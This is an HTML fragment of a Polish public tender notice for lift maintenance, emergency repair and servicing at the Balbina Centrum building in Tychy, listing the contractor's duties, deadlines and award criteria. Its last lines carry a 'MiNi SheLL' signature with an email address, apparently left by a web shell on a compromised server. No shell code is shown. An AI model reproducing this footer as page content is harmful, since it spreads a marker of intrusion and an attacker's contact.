<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie Nr 2 - Naprawy i konserwacji dźwigów osobowych w budynku użyteczności
            publicznej Balbina Centrum położonego w Tychach przy ulicy Barona 30.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia są usługi w zakresie technicznego utrzymania urządzeń
            dźwigowych, polegającym na prowadzeniu bieżącej konserwacji,  usuwaniu awarii wraz ze
            świadczeniem czynności pogotowia technicznego oraz wykonywaniu napraw w zakresie
            wykraczającym poza czynności konserwacyjne w budynku użyteczności publicznej Balbina Centrum położonego w Tychach przy ulicy Barona 30
             Wykaz dźwigów ich charakterystykę zawiera:
- dla Zadania Nr 2 - Załącznik Nr 2 do SIWZ.
Zakres usług dla Zadania Nr 2 obejmuje m.in.:
1. Do obowiązków Wykonawcy należy dbanie o spełnienie warunków wynikających z
            zakresu przeglądów P1 i P2, w szczególności dbanie o:
        1) należyty stan techniczny wszelkich mechanizmów napędowych ;
        2) należyte działanie urządzeń i układów sterowych ;
        3) należyte działanie urządzeń bezpieczeństwa, drzwi przystankowych i drzwi kabinowych ;
        4) należyte działanie urządzeń chwytających, stanu cięgien i lin nośnych, ich zamocowań 
            i elementów zawieszenia;
        5) należyte działanie wskaźników sygnalizacji i oświetlenia w kabinie dźwigu ; 
        6) smarowanie wszystkich elementów wymagających smarowania ;
        7) utrzymanie w czystości maszynowni, podszybia i dachu kabiny ; 
        8) wykonywanie wszelkich niezbędnych pomiarów elektrycznych ;
        9) wykonywanie i przestrzeganie zaleceń i nakazów wydanych przez właściwy organ dozoru
            Technicznego ;


10) sprawdzanie urządzeń pod kątem jakości pracy ;
11) kontrola stanu oleju napędu ;

2. Ponadto Wykonawca zobowiązany jest:
 1) przestrzegać instrukcji konserwacji, usuwać na bieżąco usterki i inne nieprawidłowości 
     w działaniu urządzenia oraz dokonywać przeglądów w terminach określonych w instrukcji
     eksploatacji ;
 2) prowadzić dziennik konserwacji dźwigu poprzez dokonywanie zapisów wszelkich 
     wykonywanych czynności w terminach dokonanych konserwacji oraz przygotowywania 
     dźwigów i brania czynnego udziału w czasie przeprowadzania badań zwyczajnych i 
     nadzwyczajnych określonych przez dozór techniczny ;
3) zwracać uwagę i reagować na nieprawidłowości użytkowania urządzenia dźwigowego;
4) powiadamiać kierowników poszczególnych Rejonów Obsługi Mieszkańców 
   (dalej zwane ROM) o stwierdzonych przypadkach dewastacji, kradzieży lub wadliwej pracy
    dźwigu zwłaszcza wtedy, gdy może to mieć wpływ na bezpieczeństwo eksploatacji urządzenia ;
5) reprezentować Zamawiającego podczas kontroli przeprowadzonych przez Urząd Dozoru
    Technicznego zwany dalej UDT, służby p. poż. itd.;
6) przestrzegać terminów badań kontrolnych i konserwacyjnych dźwigu ;
7) wyprzedzająco informować kierowników poszczególnych ROM -ów o konieczności wykonania
    czynności zmierzających do bezawaryjnej pracy urządzenia;

3. Awarie:
    Usuwanie awarii wraz ze świadczeniem pogotowia technicznego polegać będzie na usuwaniu w
    sposób niezwłoczny zgłaszanych awarii. Nadto Wykonawca zobowiązany jest przyjmować
    zgłoszenia mieszkańców/użytkowników nieruchomości, w zakresie objętym przedmiotem
    zamówienia, reagować na zgłoszenie awarii do 10 minut od momentu przyjęcia zgłoszenia i
    usuwać awarie lub powiadomić kierownika danego ROM-u o konieczności wykonania naprawy
    wykraczającej poza zakres konserwacji, w terminie nie dłuższym niż 2 godziny od chwili
    otrzymania telefonicznego zgłoszenia.

4. Naprawy:
    Usługi wykraczające swym zakresem poza bieżącą konserwację.
    Konieczność wykonania czynności naprawczych dźwigu Wykonawca zgłosi do Kierownika 
    danego ROM - u  i  przedstawi kalkulację. 
    Przedstawiciel Rom -u  wystawi zlecenie na naprawę..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.53.14.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Stawka roboczogodziny kosztorysowej -% - 40</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com